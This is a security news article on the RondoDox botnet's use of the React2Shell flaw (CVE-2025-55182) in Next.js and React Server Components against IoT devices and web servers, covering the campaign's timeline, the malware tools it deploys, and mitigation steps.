RondoDox Botnet Exploits React2Shell Flaw to Hijack IoT Devices, Web Servers
A persistent cyber campaign has emerged, targeting Internet of Things (IoT) devices and web applications. This campaign has led to the formation of a botnet called RondoDox, which has been active for approximately nine months. Recent analyses by CloudSEK indicate that as of December 2025, the botnet exploits a critical vulnerability known as React2Shell, identified as CVE-2025-55182, with a CVSS score of 10.0.
Understanding the React2Shell Vulnerability
The React2Shell flaw affects React Server Components (RSC) and Next.js frameworks. It allows unauthorized attackers to execute remote code on vulnerable devices. As of late December 2025, around 90,300 systems remain at risk due to this vulnerability, as highlighted by data from the Shadowserver Foundation.
Geographical Impact of Vulnerability
- United States: 68,400 vulnerable instances
- Germany: 4,300 vulnerable instances
- France: 2,800 vulnerable instances
- India: 1,500 vulnerable instances
Evolution of the RondoDox Botnet
RondoDox first appeared in early 2025, expanding its operations by targeting various security vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. Chronicled by cybersecurity firms such as Darktrace, Kaspersky, and VulnCheck, the campaign has followed several distinct phases:
- March – April 2025: Initial reconnaissance and vulnerability scanning.
- April – June 2025: Mass probing of web applications (like WordPress, Drupal, Struts2) and IoT devices (such as Wavlink routers).
- July – December 2025: Automated large-scale deployment of malware.
Recent Attacks and Techniques
In December 2025, threat actors actively scanned for vulnerable Next.js servers. Their activities included deploying various malicious tools:
- Cryptocurrency miners: Labeled as “/nuts/poop.”
- Botnet loader and health checker: Referred to as “/nuts/bolts.”
- Mirai botnet variant: Designated as “/nuts/x86.”
The “/nuts/bolts” tool effectively terminates competing malware, including coin miners, before loading the primary bot binary from the command-and-control (C2) server. It also manages processes to ensure that rival threats are eliminated every 45 seconds.
Mitigation Strategies
To address the risk associated with the RondoDox botnet, organizations should consider the following measures:
- Update Next.js to the latest patched version promptly.
- Segment IoT devices into dedicated VLANs to enhance security.
- Implement Web Application Firewalls (WAFs) to protect web applications.
- Monitor systems for suspicious process executions.
- Block known C2 infrastructure to prevent unauthorized access.
By adopting these strategies, organizations can reduce their vulnerability to the ongoing threats posed by the RondoDox botnet and ensure better protection of their digital environments.
